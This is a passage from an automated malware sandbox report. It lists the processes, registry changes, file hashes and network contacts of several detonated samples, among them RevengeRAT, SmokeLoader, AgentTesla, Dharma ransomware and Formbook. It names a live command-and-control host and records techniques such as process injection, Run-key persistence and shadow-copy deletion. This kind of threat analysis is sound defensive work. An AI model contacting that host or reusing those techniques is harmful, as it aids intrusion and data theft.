PID 3280 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 3280 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 3280 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 880 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 880 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 880 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 1580 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 1580 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 1580 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe

"C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe"

C:\Users\Admin\AppData\Roaming\wou\odm.exe

"C:\Users\Admin\AppData\Roaming\wou\odm.exe" kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

"C:\Users\Admin\AppData\Roaming\wou\odm.exe" kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\ELGNN

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\ELGNN

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\wou\odm.exe

MD5 71d8f6d5dc35517275bc38ebcc815f9f
SHA1 cae4e8c730de5a01d30aabeb3e5cb2136090ed8d
SHA256 fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b
SHA512 4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59

C:\Users\Admin\AppData\Roaming\wou\rid.ico

MD5 a5f2dcee6a2a6047aa8fdde1ae2ce290
SHA1 7a082661c9a3431cd89ed4d9959178d60b9570f7
SHA256 7da78e767ff859970c8dae593b62f1366c2c651500eb280f0077a2245a9a8625
SHA512 e001300fc56f9bc8e9d61cb904ea6dec5ca447729015c9ff3dccc021f319fcce57ebaabb196a56f80d249dfbb88b4a0a273858cf14c7b9a93c10c9c8bc243d0a

C:\Users\Admin\AppData\Roaming\wou\ELGNN

MD5 2fc79199952da8ef486b513a911b6fd4
SHA1 c840b0684f2ebdbbf603fabf4a32e629453c48d0
SHA256 a4ff9e68389eceb7e9fe4a6c428d156e9b5536e1dc1f83f05e3c69ce312f465c
SHA512 7b4fd2a5fb42fbfd4e4f5b4a19b82aa4761bf40192eef83321a034cd531e8a7309e5c68628e594435ae0869579bc251d8eef168c833dc8dbbf75e68d41ec0f4d

Analysis: behavioral14

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe

"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win7-20240903-en

Max time kernel

130s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe"

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Roaming\\Client.exe" C:\Users\Admin\AppData\Roaming\Client.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe

"C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe"

C:\Users\Admin\AppData\Roaming\Client.exe

"C:\Users\Admin\AppData\Roaming\Client.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 cocohack.dtdns.net udp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp

Files

memory/2808-0-0x000007FEF670E000-0x000007FEF670F000-memory.dmp

memory/2808-1-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

memory/2808-2-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

memory/2808-3-0x000007FEF670E000-0x000007FEF670F000-memory.dmp

memory/2808-4-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

memory/2808-13-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

memory/2440-14-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

memory/2440-12-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

C:\Users\Admin\AppData\Roaming\Client.exe

MD5 aa0a434f00c138ef445bf89493a6d731
SHA1 2e798c079b179b736247cf20d1346657db9632c7
SHA256 948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654
SHA512 e5b50ccd82c9cd5797dfc278dbd4bef6b4cb4468424962666d2618707a3c69e0154e8fb11846e0f529dd6e903fd9de2a2f4dd3b526821b10f08530371a0c6952

memory/2440-15-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4468 set thread context of 4724 N/A C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4468-1-0x0000000000CA0000-0x0000000000DA0000-memory.dmp

memory/4468-2-0x0000000000C30000-0x0000000000C3B000-memory.dmp

memory/4724-3-0x0000000000400000-0x000000000040A000-memory.dmp

memory/4724-4-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D47F.tmp

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

memory/4724-10-0x0000000000400000-0x000000000040A000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win7-20241010-en

Max time kernel

5s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Danabot

trojan banker danabot

Danabot family

danabot

Dharma

ransomware dharma

Dharma family

dharma

Formbook

trojan spyware stealer formbook

Formbook family

formbook

Gozi

banker trojan gozi

Gozi family

gozi

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Raccoon family

raccoon

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ReZer0 packer

rezer0
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\5.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\6.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\12.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\11.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\13.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\15.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\17.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\21.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\23.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\25.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\27.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\29.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\31.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\14.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\16.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\18.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\20.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\24.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\26.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\28.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\30.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2752 set thread context of 1556 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 1556 set thread context of 1200 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\13.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\26.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\11.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\27.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\23.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\25.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\15.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\31.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\22.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\31.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\3.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\5.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\6.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\11.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\12.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\13.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\14.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\15.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\16.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\17.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\18.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\20.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\21.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\23.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\24.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\25.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\26.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\27.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\28.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\29.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\30.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\31.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\27.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\5.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1156 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 1156 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 1156 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 1156 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 3016 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre7\bin\javaw.exe
PID 3016 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre7\bin\javaw.exe
PID 3016 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre7\bin\javaw.exe
PID 3016 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3016 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3016 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3016 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3016 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3016 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3016 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3016 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3016 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 3016 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 3016 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 3016 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 2752 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 2752 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 2752 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 2752 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3016 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 3016 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 3016 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 3016 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 3016 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 3016 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 3016 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 3016 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 3016 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 3016 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 3016 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 3016 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 1200 wrote to memory of 2888 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\wininit.exe
PID 1200 wrote to memory of 2888 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\wininit.exe
PID 1200 wrote to memory of 2888 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\wininit.exe
PID 1200 wrote to memory of 2888 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\wininit.exe
PID 3016 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 3016 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 3016 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 3016 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 3016 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 3016 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 3016 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 3016 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 3016 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 3016 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 3016 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 3016 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 3016 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 3016 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 3016 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 3016 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
